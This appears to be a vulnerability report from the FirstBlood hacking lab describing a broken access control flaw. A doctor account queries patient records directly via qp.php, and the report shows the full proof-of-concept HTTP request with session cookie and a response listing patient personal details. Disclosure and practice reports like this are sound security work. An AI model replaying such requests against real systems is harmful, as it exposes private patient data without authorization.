FirstBlood-#510New registered doctor account can query patient directly via POST https://a9381b5eb20c-0xconft.a.firstbloodhackers.com/drpanel/drapi/qp.php
This issue was discovered on FirstBlood v2



On 2021-10-25, 0xconft Level 5 reported:

Hi there,

I tested that new registered doctor account can still query patient by directly sending request to /drpanel/drapi/qp.php endpoint

PoC

POST /drpanel/drapi/qp.php HTTP/1.1
Host: a9381b5eb20c-0xconft.a.firstbloodhackers.com
Cookie: drps=8a449f4da6dc67c3c5edc5df5
Content-Length: 8
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://a9381b5eb20c-0xconft.a.firstbloodhackers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://a9381b5eb20c-0xconft.a.firstbloodhackers.com/drpanel/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

name=sea

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Oct 2021 22:17:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 228

Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>

Best Regards, 0xconft

P3 Medium

Endpoint: /drpanel/drapi/qp.php

Parameter: name

Payload: patient name


FirstBlood ID: 40
Vulnerability Type: Application/Business Logic

The endpoint qp.php use to respond to GET requests and it should only allow administrators to query for patient information however the developers only fixed the bug partially and it still allowed for doctors to query for patient information. query.php is related to this file and in v1 allowed for Doctors and admins, but query.php was fixed completely whereas qp.php was not.